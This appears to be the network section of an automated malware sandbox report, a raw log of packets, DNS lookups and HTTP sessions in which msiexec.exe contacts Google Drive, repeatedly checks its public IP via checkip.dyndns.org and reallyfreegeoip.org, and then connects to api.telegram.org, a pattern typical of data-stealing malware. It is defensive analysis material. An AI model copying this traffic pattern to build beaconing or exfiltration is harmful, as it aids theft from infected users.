                                                                                                                                                          Dec 17, 2024 13:21:56.101006985 CET44349808104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:56.148758888 CET49808443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:56.148798943 CET44349808104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:56.548054934 CET44349808104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:56.548127890 CET44349808104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:56.548178911 CET49808443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:56.548737049 CET49808443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:56.552186966 CET4980280192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:56.553072929 CET4981380192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:56.672424078 CET8049802193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:56.672588110 CET4980280192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:56.672815084 CET8049813193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:56.672907114 CET4981380192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:56.673068047 CET4981380192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:56.792717934 CET8049813193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:57.788716078 CET8049813193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:57.789005995 CET4981380192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:57.790380001 CET49815443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:57.790446997 CET44349815104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:57.790563107 CET49815443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:57.790863037 CET49815443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:57.790882111 CET44349815104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:57.909202099 CET8049813193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:57.909315109 CET4981380192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:59.006701946 CET44349815104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:59.008599997 CET49815443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:59.008671045 CET44349815104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:59.451473951 CET44349815104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:59.451555967 CET44349815104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:59.451647997 CET49815443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:59.452161074 CET49815443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:21:59.456849098 CET4982180192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:59.576638937 CET8049821193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:59.576754093 CET4982180192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:59.577003956 CET4982180192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:21:59.696723938 CET8049821193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:00.673755884 CET8049821193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:00.674959898 CET49823443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:00.675031900 CET44349823104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:00.675116062 CET49823443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:00.675363064 CET49823443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:00.675395966 CET44349823104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:00.713632107 CET4982180192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:01.886787891 CET44349823104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:01.888494015 CET49823443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:01.888545990 CET44349823104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:02.337064981 CET44349823104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:02.337132931 CET44349823104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:02.337234020 CET49823443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:02.337696075 CET49823443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:02.342714071 CET4982180192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:02.343862057 CET4982880192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:02.462969065 CET8049821193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:02.463095903 CET4982180192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:02.463727951 CET8049828193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:02.463818073 CET4982880192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:02.464032888 CET4982880192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:02.583776951 CET8049828193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:03.560493946 CET8049828193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:03.561619043 CET49834443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:03.561669111 CET44349834104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:03.561728001 CET49834443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:03.561973095 CET49834443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:03.561990023 CET44349834104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:03.604254007 CET4982880192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:04.777795076 CET44349834104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:04.779376030 CET49834443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:04.779397964 CET44349834104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:05.227149963 CET44349834104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:05.227339029 CET44349834104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:05.227515936 CET49834443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:05.227808952 CET49834443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:05.231131077 CET4982880192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:05.232309103 CET4983580192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:05.351347923 CET8049828193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:05.351418972 CET4982880192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:05.352274895 CET8049835193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:05.352361917 CET4983580192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:05.352478027 CET4983580192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:05.472239017 CET8049835193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:06.465234995 CET8049835193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:06.506388903 CET49841443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:06.506423950 CET44349841104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:06.506557941 CET49841443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:06.506803036 CET49841443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:06.506822109 CET44349841104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:06.510523081 CET4983580192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:07.723253965 CET44349841104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:07.725981951 CET49841443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:07.726011992 CET44349841104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:08.174711943 CET44349841104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:08.174885988 CET44349841104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:08.174951077 CET49841443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:08.175282001 CET49841443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:08.178061008 CET4983580192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:08.179193020 CET4984780192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:08.298180103 CET8049835193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:08.298310041 CET4983580192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:08.299088001 CET8049847193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:08.299185991 CET4984780192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:08.299333096 CET4984780192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:08.419162035 CET8049847193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:09.395684958 CET8049847193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:09.396851063 CET49848443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:09.396898031 CET44349848104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:09.397047997 CET49848443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:09.397218943 CET49848443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:09.397231102 CET44349848104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:09.453877926 CET4984780192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:10.614305019 CET44349848104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:10.615930080 CET49848443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:10.616005898 CET44349848104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:11.060173035 CET44349848104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:11.060338974 CET44349848104.21.67.152192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:11.060409069 CET49848443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:11.060815096 CET49848443192.168.2.7104.21.67.152
                                                                                                                                                          Dec 17, 2024 13:22:11.090630054 CET4984780192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:11.210689068 CET8049847193.122.130.0192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:11.210807085 CET4984780192.168.2.7193.122.130.0
                                                                                                                                                          Dec 17, 2024 13:22:11.228512049 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          Dec 17, 2024 13:22:11.228547096 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:11.228620052 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          Dec 17, 2024 13:22:11.229089022 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          Dec 17, 2024 13:22:11.229104042 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:12.603363037 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:12.603497028 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          Dec 17, 2024 13:22:12.605509043 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          Dec 17, 2024 13:22:12.605515957 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:12.605870008 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:12.607405901 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          Dec 17, 2024 13:22:12.655337095 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:13.113717079 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:13.113889933 CET44349854149.154.167.220192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:13.113960028 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          Dec 17, 2024 13:22:13.116178036 CET49854443192.168.2.7149.154.167.220
                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Dec 17, 2024 13:21:33.255321980 CET5849653192.168.2.71.1.1.1
                                                                                                                                                          Dec 17, 2024 13:21:33.392554045 CET53584961.1.1.1192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:36.735153913 CET6250453192.168.2.71.1.1.1
                                                                                                                                                          Dec 17, 2024 13:21:36.874860048 CET53625041.1.1.1192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:43.981441021 CET5041053192.168.2.71.1.1.1
                                                                                                                                                          Dec 17, 2024 13:21:44.122992992 CET53504101.1.1.1192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:21:46.349853992 CET5273753192.168.2.71.1.1.1
                                                                                                                                                          Dec 17, 2024 13:21:46.490920067 CET53527371.1.1.1192.168.2.7
                                                                                                                                                          Dec 17, 2024 13:22:11.090507984 CET5653253192.168.2.71.1.1.1
                                                                                                                                                          Dec 17, 2024 13:22:11.227705002 CET53565321.1.1.1192.168.2.7
                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Dec 17, 2024 13:21:33.255321980 CET192.168.2.71.1.1.10x2015Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:36.735153913 CET192.168.2.71.1.1.10x8719Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:43.981441021 CET192.168.2.71.1.1.10x7e56Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:46.349853992 CET192.168.2.71.1.1.10x469bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:22:11.090507984 CET192.168.2.71.1.1.10x2a0eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Dec 17, 2024 13:21:33.392554045 CET1.1.1.1192.168.2.70x2015No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:36.874860048 CET1.1.1.1192.168.2.70x8719No error (0)drive.usercontent.google.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:44.122992992 CET1.1.1.1192.168.2.70x7e56No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:44.122992992 CET1.1.1.1192.168.2.70x7e56No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:44.122992992 CET1.1.1.1192.168.2.70x7e56No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:44.122992992 CET1.1.1.1192.168.2.70x7e56No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:44.122992992 CET1.1.1.1192.168.2.70x7e56No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:44.122992992 CET1.1.1.1192.168.2.70x7e56No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:46.490920067 CET1.1.1.1192.168.2.70x469bNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:21:46.490920067 CET1.1.1.1192.168.2.70x469bNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 17, 2024 13:22:11.227705002 CET1.1.1.1192.168.2.70x2a0eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                          • drive.google.com
                                                                                                                                                          • drive.usercontent.google.com
                                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                                          • api.telegram.org
                                                                                                                                                          • checkip.dyndns.org
                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.749778193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:21:44.247117043 CET151OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Dec 17, 2024 13:21:45.348414898 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:45 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: ef3114677c32626054a301632f7d34b2
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                          Dec 17, 2024 13:21:45.353056908 CET127OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Dec 17, 2024 13:21:45.674164057 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:45 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: 6c0e37977be04faadcbfb45495a3a6e9
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                          Dec 17, 2024 13:21:48.173476934 CET127OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Dec 17, 2024 13:21:48.494707108 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:48 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: a294b3a305a32b7faa245fcaea2e896e
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.749794193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:21:50.282883883 CET127OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Dec 17, 2024 13:21:51.379437923 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:51 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: 97b046c7939595fefd602166125bcb34
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.749802193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:21:53.430732965 CET127OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Dec 17, 2024 13:21:54.528269053 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:54 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: 51a9d6546f484b5b648709818291a74e
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                          Dec 17, 2024 13:21:55.008661985 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:54 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: 51a9d6546f484b5b648709818291a74e
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.749813193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:21:56.673068047 CET127OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Dec 17, 2024 13:21:57.788716078 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:57 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: e8dd655e44bb6f4f750e49969f5defaf
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          4192.168.2.749821193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:21:59.577003956 CET151OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Dec 17, 2024 13:22:00.673755884 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:00 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: 9c941f707c9d7fd31fac18cc2b0bb0d8
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          5192.168.2.749828193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:22:02.464032888 CET151OUTGET / HTTP/1.1
